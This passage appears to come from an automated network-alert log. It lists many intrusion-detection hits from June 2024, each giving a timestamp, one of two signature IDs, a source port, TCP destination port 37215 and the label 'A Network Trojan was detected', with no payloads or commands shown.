                Timestamp:06/14/24-10:44:33.131805
                SID:2835222
                Source Port:32806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027242
                SID:2835222
                Source Port:35744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913558
                SID:2835222
                Source Port:46128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182821
                SID:2829579
                Source Port:33928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338883
                SID:2835222
                Source Port:55280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614540
                SID:2835222
                Source Port:53816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733309
                SID:2835222
                Source Port:56442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761492
                SID:2835222
                Source Port:36696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846347
                SID:2835222
                Source Port:37268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915483
                SID:2835222
                Source Port:42224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760871
                SID:2829579
                Source Port:40300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978431
                SID:2835222
                Source Port:40408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086204
                SID:2835222
                Source Port:37850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472851
                SID:2835222
                Source Port:35576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645500
                SID:2835222
                Source Port:40708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807252
                SID:2835222
                Source Port:40658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.910398
                SID:2829579
                Source Port:32836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968358
                SID:2829579
                Source Port:38634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341340
                SID:2835222
                Source Port:44878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242646
                SID:2835222
                Source Port:34924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705543
                SID:2835222
                Source Port:52994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967219
                SID:2835222
                Source Port:43102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792382
                SID:2835222
                Source Port:51260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988020
                SID:2835222
                Source Port:60108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970681
                SID:2829579
                Source Port:49320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618729
                SID:2829579
                Source Port:44332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369296
                SID:2829579
                Source Port:54988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967396
                SID:2829579
                Source Port:49864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517693
                SID:2829579
                Source Port:39222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972359
                SID:2835222
                Source Port:48944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338532
                SID:2835222
                Source Port:33098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344197
                SID:2829579
                Source Port:39252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966394
                SID:2835222
                Source Port:55368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056602
                SID:2829579
                Source Port:35306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056707
                SID:2835222
                Source Port:33002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906521
                SID:2835222
                Source Port:48586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806869
                SID:2835222
                Source Port:35444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289695
                SID:2829579
                Source Port:39132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018009
                SID:2835222
                Source Port:56790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293129
                SID:2829579
                Source Port:34480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201132
                SID:2835222
                Source Port:48516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277985
                SID:2835222
                Source Port:35974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880869
                SID:2829579
                Source Port:34260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032239
                SID:2835222
                Source Port:38086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846956
                SID:2829579
                Source Port:50476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763851
                SID:2829579
                Source Port:51072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180407
                SID:2835222
                Source Port:36136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147024
                SID:2829579
                Source Port:41490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.046007
                SID:2829579
                Source Port:38252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906594
                SID:2835222
                Source Port:53302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451879
                SID:2829579
                Source Port:33696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032120
                SID:2835222
                Source Port:57544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504737
                SID:2835222
                Source Port:43692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505191
                SID:2829579
                Source Port:54934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718162
                SID:2835222
                Source Port:48748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133502
                SID:2829579
                Source Port:52304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013027
                SID:2835222
                Source Port:59368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969151
                SID:2835222
                Source Port:56440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423754
                SID:2829579
                Source Port:60254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502301
                SID:2835222
                Source Port:32768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717023
                SID:2829579
                Source Port:53514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791934
                SID:2829579
                Source Port:45856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805844
                SID:2829579
                Source Port:35698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944661
                SID:2835222
                Source Port:40932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971311
                SID:2835222
                Source Port:51168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807048
                SID:2829579
                Source Port:43176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424304
                SID:2835222
                Source Port:44572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999807
                SID:2829579
                Source Port:38940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179287
                SID:2835222
                Source Port:49482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766637
                SID:2835222
                Source Port:38114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134223
                SID:2829579
                Source Port:58766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033865
                SID:2829579
                Source Port:49154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811710
                SID:2835222
                Source Port:41994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881950
                SID:2835222
                Source Port:46004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644502
                SID:2829579
                Source Port:54520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152634
                SID:2835222
                Source Port:57402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829840
                SID:2835222
                Source Port:49440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092919
                SID:2835222
                Source Port:47648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409995
                SID:2829579
                Source Port:41374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896393
                SID:2829579
                Source Port:60582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663486
                SID:2829579
                Source Port:44374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943047
                SID:2829579
                Source Port:36012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111774
                SID:2835222
                Source Port:42582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985001
                SID:2835222
                Source Port:34904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324864
                SID:2835222
                Source Port:45828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198852
                SID:2835222
                Source Port:39240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178242
                SID:2835222
                Source Port:41134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985397
                SID:2835222
                Source Port:58260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273822
                SID:2829579
                Source Port:37090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504616
                SID:2835222
                Source Port:42866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029408
                SID:2835222
                Source Port:34130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792668
                SID:2835222
                Source Port:45316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324556
                SID:2829579
                Source Port:51390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546143
                SID:2829579
                Source Port:57342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564805
                SID:2835222
                Source Port:35232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471750
                SID:2829579
                Source Port:41104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503033
                SID:2829579
                Source Port:50666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053230
                SID:2835222
                Source Port:34670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916644
                SID:2829579
                Source Port:39404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133241
                SID:2835222
                Source Port:49760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827653
                SID:2835222
                Source Port:56882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419487
                SID:2835222
                Source Port:35762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010699
                SID:2829579
                Source Port:35852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759486
                SID:2829579
                Source Port:34832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860585
                SID:2829579
                Source Port:52942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735415
                SID:2835222
                Source Port:46382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701150
                SID:2835222
                Source Port:51546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549232
                SID:2829579
                Source Port:34854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295530
                SID:2829579
                Source Port:58842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678853
                SID:2829579
                Source Port:45066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700306
                SID:2835222
                Source Port:39260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229537
                SID:2835222
                Source Port:38064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811425
                SID:2829579
                Source Port:38844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968268
                SID:2835222
                Source Port:59268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828205
                SID:2835222
                Source Port:60270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732651
                SID:2829579
                Source Port:52574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970992
                SID:2835222
                Source Port:59942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807300
                SID:2829579
                Source Port:41056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804875
                SID:2829579
                Source Port:41836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.181929
                SID:2829579
                Source Port:53762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517850
                SID:2829579
                Source Port:52434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151935
                SID:2829579
                Source Port:54992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028933
                SID:2829579
                Source Port:39124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944645
                SID:2835222
                Source Port:35502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203235
                SID:2835222
                Source Port:49316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503637
                SID:2835222
                Source Port:38650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717183
                SID:2835222
                Source Port:33768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185897
                SID:2829579
                Source Port:52812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966639
                SID:2835222
                Source Port:60866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229974
                SID:2835222
                Source Port:57412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761684
                SID:2835222
                Source Port:37020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942170
                SID:2835222
                Source Port:54170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292875
                SID:2835222
                Source Port:33962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761510
                SID:2829579
                Source Port:53844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182621
                SID:2835222
                Source Port:49318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725816
                SID:2835222
                Source Port:47096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184736
                SID:2829579
                Source Port:34738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502056
                SID:2829579
                Source Port:46054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829603
                SID:2829579
                Source Port:40598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703350
                SID:2835222
                Source Port:50126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916196
                SID:2829579
                Source Port:39216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668801
                SID:2835222
                Source Port:38236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132808
                SID:2835222
                Source Port:34312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998643
                SID:2835222
                Source Port:49012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115692
                SID:2835222
                Source Port:51458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646868
                SID:2835222
                Source Port:54508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779166
                SID:2835222
                Source Port:48494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024437
                SID:2829579
                Source Port:60486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966166
                SID:2835222
                Source Port:51314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198889
                SID:2835222
                Source Port:45202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453755
                SID:2835222
                Source Port:45712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967600
                SID:2829579
                Source Port:60138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134032
                SID:2835222
                Source Port:46780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858826
                SID:2835222
                Source Port:58750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941783
                SID:2829579
                Source Port:47686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762784
                SID:2835222
                Source Port:45156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999448
                SID:2835222
                Source Port:48948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969454
                SID:2835222
                Source Port:38594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505250
                SID:2835222
                Source Port:57244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.078671
                SID:2829579
                Source Port:41008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384380
                SID:2835222
                Source Port:54806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617590
                SID:2829579
                Source Port:45102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717377
                SID:2835222
                Source Port:52082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382719
                SID:2835222
                Source Port:59152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294871
                SID:2835222
                Source Port:41152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846849
                SID:2829579
                Source Port:39828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717584
                SID:2829579
                Source Port:39448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244854
                SID:2835222
                Source Port:51706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828232
                SID:2829579
                Source Port:42264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057542
                SID:2835222
                Source Port:50280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146341
                SID:2835222
                Source Port:39514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689518
                SID:2835222
                Source Port:33220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132062
                SID:2829579
                Source Port:57582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618401
                SID:2829579
                Source Port:60404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761300
                SID:2829579
                Source Port:44410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790986
                SID:2835222
                Source Port:34378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644713
                SID:2835222
                Source Port:41316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997493
                SID:2829579
                Source Port:46304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848254
                SID:2829579
                Source Port:53976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717054
                SID:2829579
                Source Port:39658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073723
                SID:2829579
                Source Port:36180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878388
                SID:2835222
                Source Port:48612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073031
                SID:2829579
                Source Port:45374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030408
                SID:2829579
                Source Port:59414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421525
                SID:2835222
                Source Port:48068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134625
                SID:2835222
                Source Port:58596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051460
                SID:2835222
                Source Port:41696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290604
                SID:2835222
                Source Port:50732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857763
                SID:2835222
                Source Port:56150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942044
                SID:2835222
                Source Port:33782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183786
                SID:2835222
                Source Port:59658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021334
                SID:2835222
                Source Port:48500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030533
                SID:2829579
                Source Port:58472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023833
                SID:2835222
                Source Port:47392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383293
                SID:2835222
                Source Port:52864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018352
                SID:2829579
                Source Port:53798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915041
                SID:2829579
                Source Port:55984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640726
